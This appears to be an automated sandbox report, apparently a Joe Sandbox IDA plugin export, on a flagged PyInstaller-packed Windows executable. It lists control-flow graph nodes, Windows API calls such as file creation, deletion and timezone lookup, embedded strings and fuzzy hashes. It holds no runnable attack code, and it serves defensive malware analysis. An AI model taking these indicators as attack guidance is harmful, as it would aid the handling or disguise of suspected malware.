19395->19019 19396->19395 19747 7ff7b2b7afd0 19748 7ff7b2b7afd5 19747->19748 19749 7ff7b2b7afea 19747->19749 19753 7ff7b2b7aff0 19748->19753 19754 7ff7b2b7b03a 19753->19754 19755 7ff7b2b7b032 19753->19755 19756 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19756 19757 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19755->19757 19758 7ff7b2b7b047 19756->19758 19757->19754 19759 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19758->19759 19760 7ff7b2b7b054 19759->19760 19761 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19760->19761 19762 7ff7b2b7b061 19761->19762 19763 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19762->19763 19764 7ff7b2b7b06e 19763->19764 19765 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19764->19765 19766 7ff7b2b7b07b 19765->19766 19767 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19766->19767 19768 7ff7b2b7b088 19767->19768 19769 7ff7b2b7a948 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19768->19769 19770 7ff7b2b7b095 19769->19770 19771 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19770->19771 19772 7ff7b2b7b0a5 19771->19772 19773 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19772->19773 19774 7ff7b2b7b0b5 19773->19774 19779 7ff7b2b7ae94 19774->19779 19793 7ff7b2b802d8 EnterCriticalSection 19779->19793 19920 7ff7b2b79d50 19923 7ff7b2b79ccc 19920->19923 19930 7ff7b2b802d8 EnterCriticalSection 19923->19930 19934 7ff7b2b6cb50 19935 7ff7b2b6cb60 19934->19935 19951 7ff7b2b79ba8 19935->19951 19937 7ff7b2b6cb6c 19957 7ff7b2b6ce48 19937->19957 19939 7ff7b2b6cbd9 19941 7ff7b2b6d12c 7 API calls 19939->19941 19950 7ff7b2b6cbf5 19939->19950 19940 7ff7b2b6cb84 _RTC_Initialize 19940->19939 19962 7ff7b2b6cff8 19940->19962 19942 7ff7b2b6cc05 19941->19942 19944 7ff7b2b6cb99 19965 7ff7b2b79014 19944->19965 19952 7ff7b2b79bb9 19951->19952 19953 7ff7b2b74f08 _get_daylight 11 API calls 19952->19953 19954 7ff7b2b79bc1 19952->19954 19955 7ff7b2b79bd0 19953->19955 19954->19937 19956 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19955->19956 19956->19954 19958 7ff7b2b6ce59 19957->19958 19961 7ff7b2b6ce5e __scrt_release_startup_lock 19957->19961 19959 7ff7b2b6d12c 7 API calls 19958->19959 19958->19961 19960 7ff7b2b6ced2 19959->19960 19961->19940 19990 7ff7b2b6cfbc 19962->19990 19964 7ff7b2b6d001 19964->19944 19966 7ff7b2b79034 19965->19966 19967 7ff7b2b6cba5 19965->19967 19968 7ff7b2b7903c 19966->19968 19969 7ff7b2b79052 GetModuleFileNameW 19966->19969 19967->19939 19989 7ff7b2b6d0cc InitializeSListHead 19967->19989 19970 7ff7b2b74f08 _get_daylight 11 API calls 19968->19970 19973 7ff7b2b7907d 19969->19973 19971 7ff7b2b79041 19970->19971 19972 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19971->19972 19972->19967 20005 7ff7b2b78fb4 19973->20005 19976 7ff7b2b790c5 19977 7ff7b2b74f08 _get_daylight 11 API calls 19976->19977 19978 7ff7b2b790ca 
19977->19978 19981 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19978->19981 19979 7ff7b2b790dd 19980 7ff7b2b790ff 19979->19980 19983 7ff7b2b7912b 19979->19983 19984 7ff7b2b79144 19979->19984 19982 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19980->19982 19981->19967 19982->19967 19985 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19983->19985 19987 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19984->19987 19986 7ff7b2b79134 19985->19986 19988 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19986->19988 19987->19980 19988->19967 19991 7ff7b2b6cfd6 19990->19991 19993 7ff7b2b6cfcf 19990->19993 19994 7ff7b2b7a1ec 19991->19994 19993->19964 19997 7ff7b2b79e28 19994->19997 20004 7ff7b2b802d8 EnterCriticalSection 19997->20004 20006 7ff7b2b79004 20005->20006 20007 7ff7b2b78fcc 20005->20007 20006->19976 20006->19979 20007->20006 20008 7ff7b2b7eb98 _get_daylight 11 API calls 20007->20008 20009 7ff7b2b78ffa 20008->20009 20010 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20009->20010 20010->20006

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: cb507049de633456afe1f32bf99a2bb64d7ed7002b7c7c3c0bbf6689f7aa8371
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 1DD1C731A0AA8285E712AF38E8542ABB760FF66758F840139DB5D876ACEF7CD144C710

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: bfe24250e6e030a5c654557d1e02b7c570d566d746dc6ea7508ff042bae04871
• Instruction ID: 5369ba84b5ec896d6659514cd31c37792b2bf0098ce807c961b8f287616f1c2d
• Opcode Fuzzy Hash: bfe24250e6e030a5c654557d1e02b7c570d566d746dc6ea7508ff042bae04871
• Instruction Fuzzy Hash: 8132B222A0A68250FB1BB72C94543BBE651AF67B40FC44036DB5D862DEFFACE454C325

Control-flow Graph
control_flow_graph 479 7ff7b2b85c00-7ff7b2b85c3b call 7ff7b2b85588 call 7ff7b2b85590 call 7ff7b2b855f8 486 7ff7b2b85e65-7ff7b2b85eb1 call 7ff7b2b7a900 call 7ff7b2b85588 call 7ff7b2b85590 call 7ff7b2b855f8 479->486 487 7ff7b2b85c41-7ff7b2b85c4c call 7ff7b2b85598 479->487 513 7ff7b2b85eb7-7ff7b2b85ec2 call 7ff7b2b85598 486->513 514 7ff7b2b85fef-7ff7b2b8605d call 7ff7b2b7a900 call 7ff7b2b81578 486->514 487->486 492 7ff7b2b85c52-7ff7b2b85c5c 487->492 494 7ff7b2b85c7e-7ff7b2b85c82 492->494 495 7ff7b2b85c5e-7ff7b2b85c61 492->495 498 7ff7b2b85c85-7ff7b2b85c8d 494->498 497 7ff7b2b85c64-7ff7b2b85c6f 495->497 501 7ff7b2b85c7a-7ff7b2b85c7c 497->501 502 7ff7b2b85c71-7ff7b2b85c78 497->502 498->498 503 7ff7b2b85c8f-7ff7b2b85ca2 call 7ff7b2b7d5fc 498->503 501->494 506 7ff7b2b85cab-7ff7b2b85cb9 501->506 502->497 502->501 509 7ff7b2b85cba-7ff7b2b85cc6 call 7ff7b2b7a948 503->509 510 7ff7b2b85ca4-7ff7b2b85ca6 call 7ff7b2b7a948 503->510 520 7ff7b2b85ccd-7ff7b2b85cd5 509->520 510->506 513->514 522 7ff7b2b85ec8-7ff7b2b85ed3 call 7ff7b2b855c8 513->522 533 7ff7b2b8606b-7ff7b2b8606e 514->533 534 7ff7b2b8605f-7ff7b2b86066 514->534 520->520 523 7ff7b2b85cd7-7ff7b2b85ce8 call 7ff7b2b80474 520->523 522->514 531 7ff7b2b85ed9-7ff7b2b85efc call 7ff7b2b7a948 GetTimeZoneInformation 522->531 523->486 532 7ff7b2b85cee-7ff7b2b85d44 call 7ff7b2b8a4d0 * 4 call 7ff7b2b85b1c 523->532 549 7ff7b2b85fc4-7ff7b2b85fee call 7ff7b2b85580 call 7ff7b2b85570 call 7ff7b2b85578 531->549 550 7ff7b2b85f02-7ff7b2b85f23 531->550 591 7ff7b2b85d46-7ff7b2b85d4a 532->591 535 7ff7b2b860a5-7ff7b2b860b8 call 7ff7b2b7d5fc 533->535 536 7ff7b2b86070 533->536 539 7ff7b2b860fb-7ff7b2b860fe 534->539 555 7ff7b2b860ba 535->555 556 7ff7b2b860c3-7ff7b2b860de call 7ff7b2b81578 535->556 542 7ff7b2b86073 536->542 541 7ff7b2b86104-7ff7b2b8610c call 7ff7b2b85c00 539->541 539->542 547 7ff7b2b86078-7ff7b2b860a4 call 7ff7b2b7a948 call 7ff7b2b6c550 541->547 542->547 548 7ff7b2b86073 call 7ff7b2b85e7c 542->548 548->547 558 7ff7b2b85f2e-7ff7b2b85f35 550->558 559 7ff7b2b85f25-7ff7b2b85f2b 550->559 565 7ff7b2b860bc-7ff7b2b860c1 call 7ff7b2b7a948 555->565 579 7ff7b2b860e5-7ff7b2b860f7 call 7ff7b2b7a948 556->579 580 7ff7b2b860e0-7ff7b2b860e3 556->580 560 7ff7b2b85f49 558->560 561 7ff7b2b85f37-7ff7b2b85f3f 558->561 559->558 570 7ff7b2b85f4b-7ff7b2b85fbf call 7ff7b2b8a4d0 * 4 call 7ff7b2b82b5c call 7ff7b2b86114 * 2 560->570 561->560 567 7ff7b2b85f41-7ff7b2b85f47 561->567 565->536 567->570 570->549 579->539 580->565 593 7ff7b2b85d4c 591->593 594 7ff7b2b85d50-7ff7b2b85d54 591->594 593->594 594->591 596 7ff7b2b85d56-7ff7b2b85d7b call 7ff7b2b76b58 594->596 602 7ff7b2b85d7e-7ff7b2b85d82 596->602 604 7ff7b2b85d84-7ff7b2b85d8f 602->604 605 7ff7b2b85d91-7ff7b2b85d95 602->605 604->605 607 7ff7b2b85d97-7ff7b2b85d9b 604->607 605->602 610 7ff7b2b85d9d-7ff7b2b85dc5 call 7ff7b2b76b58 607->610 611 7ff7b2b85e1c-7ff7b2b85e20 607->611 619 7ff7b2b85dc7 610->619 620 7ff7b2b85de3-7ff7b2b85de7 610->620 613 7ff7b2b85e27-7ff7b2b85e34 611->613 614 7ff7b2b85e22-7ff7b2b85e24 611->614 615 7ff7b2b85e36-7ff7b2b85e4c call 7ff7b2b85b1c 613->615 616 7ff7b2b85e4f-7ff7b2b85e5e call 7ff7b2b85580 call 7ff7b2b85570 613->616 614->613 615->616 616->486 623 7ff7b2b85dca-7ff7b2b85dd1 619->623 620->611 625 7ff7b2b85de9-7ff7b2b85e07 call 7ff7b2b76b58 620->625 623->620 626 7ff7b2b85dd3-7ff7b2b85de1 623->626 631 7ff7b2b85e13-7ff7b2b85e1a 625->631 626->620 626->623 631->611 632 7ff7b2b85e09-7ff7b2b85e0d 631->632 632->611 633 7ff7b2b85e0f 632->633 633->631
APIs
• _get_daylight.LIBCMT ref: 00007FF7B2B85C45
  • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
  • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
  • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
  • Part of subcall function 00007FF7B2B7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A909
  • Part of subcall function 00007FF7B2B7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A92E
• _get_daylight.LIBCMT ref: 00007FF7B2B85C34
  • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
• _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
• _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
• _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction ID: 080ee76178d6f77bf67e634cb9a1fc5aca53e6555820f28d494afc84c43a14ac
• Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
• Instruction Fuzzy Hash: 3BD11722A1A24245E722BF29C4445BBE791EF66784FC58039DB4D4B69EFFBCE441C720

Control-flow Graph
control_flow_graph 693 7ff7b2b86964-7ff7b2b869d7 call 7ff7b2b86698 696 7ff7b2b869d9-7ff7b2b869e2 call 7ff7b2b74ee8 693->696 697 7ff7b2b869f1-7ff7b2b869fb call 7ff7b2b78520 693->697 704 7ff7b2b869e5-7ff7b2b869ec call 7ff7b2b74f08 696->704 702 7ff7b2b869fd-7ff7b2b86a14 call 7ff7b2b74ee8 call 7ff7b2b74f08 697->702 703 7ff7b2b86a16-7ff7b2b86a7f CreateFileW 697->703 702->704 706 7ff7b2b86afc-7ff7b2b86b07 GetFileType 703->706 707 7ff7b2b86a81-7ff7b2b86a87 703->707 720 7ff7b2b86d32-7ff7b2b86d52 704->720 713 7ff7b2b86b5a-7ff7b2b86b61 706->713 714 7ff7b2b86b09-7ff7b2b86b44 GetLastError call 7ff7b2b74e7c CloseHandle 706->714 710 7ff7b2b86ac9-7ff7b2b86af7 GetLastError call 7ff7b2b74e7c 707->710 711 7ff7b2b86a89-7ff7b2b86a8d 707->711 710->704 711->710 718 7ff7b2b86a8f-7ff7b2b86ac7 CreateFileW 711->718 716 7ff7b2b86b69-7ff7b2b86b6c 713->716 717 7ff7b2b86b63-7ff7b2b86b67 713->717 714->704 727 7ff7b2b86b4a-7ff7b2b86b55 call 7ff7b2b74f08 714->727 724 7ff7b2b86b72-7ff7b2b86bc7 call 7ff7b2b78438 716->724 725 7ff7b2b86b6e 716->725 717->724 718->706 718->710 732 7ff7b2b86bc9-7ff7b2b86bd5 call 7ff7b2b868a0 724->732 733 7ff7b2b86be6-7ff7b2b86c17 call 7ff7b2b86418 724->733 725->724 727->704 732->733 740 7ff7b2b86bd7 732->740 738 7ff7b2b86c1d-7ff7b2b86c5f 733->738 739 7ff7b2b86c19-7ff7b2b86c1b 733->739 742 7ff7b2b86c81-7ff7b2b86c8c 738->742 743 7ff7b2b86c61-7ff7b2b86c65 738->743 741 7ff7b2b86bd9-7ff7b2b86be1 call 7ff7b2b7aac0 739->741 740->741 741->720 746 7ff7b2b86c92-7ff7b2b86c96 742->746 747 7ff7b2b86d30 742->747 743->742 745 7ff7b2b86c67-7ff7b2b86c7c 743->745 745->742 746->747 749 7ff7b2b86c9c-7ff7b2b86ce1 CloseHandle CreateFileW 746->749 747->720 750 7ff7b2b86d16-7ff7b2b86d2b 749->750 751 7ff7b2b86ce3-7ff7b2b86d11 GetLastError call 7ff7b2b74e7c call 7ff7b2b78660 749->751 750->747 751->750
APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: 264b094f57909c2bb1460f428ca1dd434130a52c72b27f80e3a9f5a970c7b9ed
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 09C1F232B25A4185EB15EF68C0852AE7771F75AB98B410239DB2E9B7E8EF78D051C310

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B6842B
• RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684AE
• DeleteFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684CD
• FindNextFileW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684DB
• FindClose.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684EC
• RemoveDirectoryW.KERNELBASE(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684F5
Strings
Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                    • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                    • Instruction ID: cead5740d0fc8d511b4d287351b0d3642f872878ce8ae89d2c6b70e8d010f390
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941C721A0E54280EA22BB28E4481BBE360FB66754FC40632D75D86A9CFFBCD549C714

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
  • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
• _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
  • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
• _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
  • Part of subcall function 00007FF7B2B855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855DC
  • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
  • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 3458911817-239921721
• Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
• Instruction ID: 1fc54b5876b81c746acc20289d48d64227c7635e6b9061996f4e4ec53b86d0e3
• Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
• Instruction Fuzzy Hash: E651E622A1924286E312FF29D4855ABF360FB6A744FC14139DB4D4B69AFFBCE400C760
APIs
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction ID: d2110104ec7205ee03b1d9cac80374c48a8c3c1b80b4462dcf66a95718dd1f68
• Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
• Instruction Fuzzy Hash: C9F02D22A1974182F7619B68B489377F350BB55324F840335DBAD456D8EF7CD048C704
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
• Instruction ID: a25ae80ef17b1ce643edd3fc4303592528a2c946cc0b7765bcdbdc3b53b0b19d
• Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
• Instruction Fuzzy Hash: 8F025021A1B64241FE97BB1D540427BA694AF63BE0FC58938DF5D4A7D9FEBCA401C320

Control-flow Graph

APIs
• Part of subcall function 00007FF7B2B67F90: _fread_nolock.LIBCMT ref: 00007FF7B2B6803A
• _fread_nolock.LIBCMT ref: 00007FF7B2B61A1B
• Part of subcall function 00007FF7B2B62910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7B2B61B6A), ref: 00007FF7B2B6295E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465306864.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465343412.00007FF7B2BA2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2465412661.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
